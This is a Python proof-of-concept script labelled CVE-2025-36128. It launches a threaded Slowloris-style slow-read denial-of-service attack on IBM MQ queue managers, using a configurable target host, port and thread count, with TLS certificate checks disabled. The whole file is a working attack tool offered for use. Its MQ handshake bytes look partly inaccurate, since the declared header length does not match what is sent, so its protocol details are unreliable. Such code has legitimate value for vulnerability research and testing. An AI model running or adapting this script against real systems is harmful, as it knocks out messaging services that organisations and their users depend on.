#!/usr/bin/env python3
"""
CVE-2025-36128 - IBM MQ Slow Read DoS PoC
This PoC demonstrates a Slowloris-type attack against IBM MQ by exploiting
the lack of proper read timeout enforcement.
"""
import socket
import ssl
import time
import threading
import argparse
import sys
class IBMMQSlowReadDoS:
def __init__(self, target_host, target_port, num_threads=50, use_ssl=False, channel=None):
self.target_host = target_host
self.target_port = target_port
self.num_threads = num_threads
self.use_ssl = use_ssl
self.channel = channel or "SYSTEM.DEF.SVRCONN"
self.sockets = []
self.running = True
def create_socket(self):
"""Create a TCP connection to IBM MQ queue manager"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect((self.target_host, self.target_port))
if self.use_ssl:
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=self.target_host)
return sock
except Exception as e:
print(f"[ERROR] Failed to create socket: {e}")
return None
def send_mq_initial_header(self, sock):
"""Send initial MQ TSP (Transmission Segment Protocol) header to establish connection"""
# MQ TSP header: 4 bytes length + protocol ID + segment type
# This is a simplified initial handshake to initiate MQ communication
tsp_header = b'\x00\x00\x00\x28' # Length: 40 bytes
tsp_header += b'TSP ' # Protocol identifier
tsp_header += b'\x01' # Segment type: initial
# MQIH (MQ Initial Header) follows
mqih = b'\x00\x00\x00\x00' # StrucId
mqih += b'\x01\x00\x00\x00' # Version
mqih += b'\x00\x00\x00\x00' # Reserved
sock.send(tsp_header + mqih)
def slow_read_attack(self, thread_id):
"""Perform slow read attack on a single connection"""
sock = self.create_socket()
if not sock:
return
try:
# Send initial MQ header to establish connection
self.send_mq_initial_header(sock)
print(f"[Thread {thread_id}] Connection established, starting slow read attack...")
# Keep connection alive by sending minimal data at very slow rate
# This exploits the missing read timeout in IBM MQ
counter = 0
while self.running:
try:
# Send a tiny data fragment every 30 seconds
# This keeps the connection from timing out on TCP level
# but exploits the missing application-level read timeout
sock.send(b'\x00')
counter += 1
if counter % 10 == 0:
print(f"[Thread {thread_id}] Connection alive, sent {counter} keep-alive bytes")
time.sleep(30)
except socket.error:
print(f"[Thread {thread_id}] Connection lost")
break
except Exception as e:
print(f"[Thread {thread_id}] Error: {e}")
finally:
try:
sock.close()
except:
pass
def launch_attack(self):
"""Launch the Slowloris-type DoS attack"""
print(f"[*] Starting CVE-2025-36128 Slow Read DoS attack")
print(f"[*] Target: {self.target_host}:{self.target_port}")
print(f"[*] Threads: {self.num_threads}")
print(f"[*] SSL: {self.use_ssl}")
threads = []
for i in range(self.num_threads):
t = threading.Thread(target=self.slow_read_attack, args=(i,))
t.daemon = True
threads.append(t)
t.start()
time.sleep(0.1) # Stagger connection creation
print(f"[*] Attack launched with {self.num_threads} slow connections")
print("[*] Press Ctrl+C to stop the attack")
try:
while self.running:
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Stopping attack...")
self.running = False
time.sleep(2)
print("[*] Attack stopped")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='CVE-2025-36128 IBM MQ Slow Read DoS PoC')
parser.add_argument('--host', required=True, help='Target IBM MQ host')
parser.add_argument('--port', type=int, default=1414, help='Target port (default: 1414)')
parser.add_argument('--threads', type=int, default=50, help='Number of attack threads (default: 50)')
parser.add_argument('--ssl', action='store_true', help='Use SSL/TLS connection')
args = parser.parse_args()
dos = IBMMQSlowReadDoS(args.host, args.port, args.threads, args.ssl)
dos.launch_attack()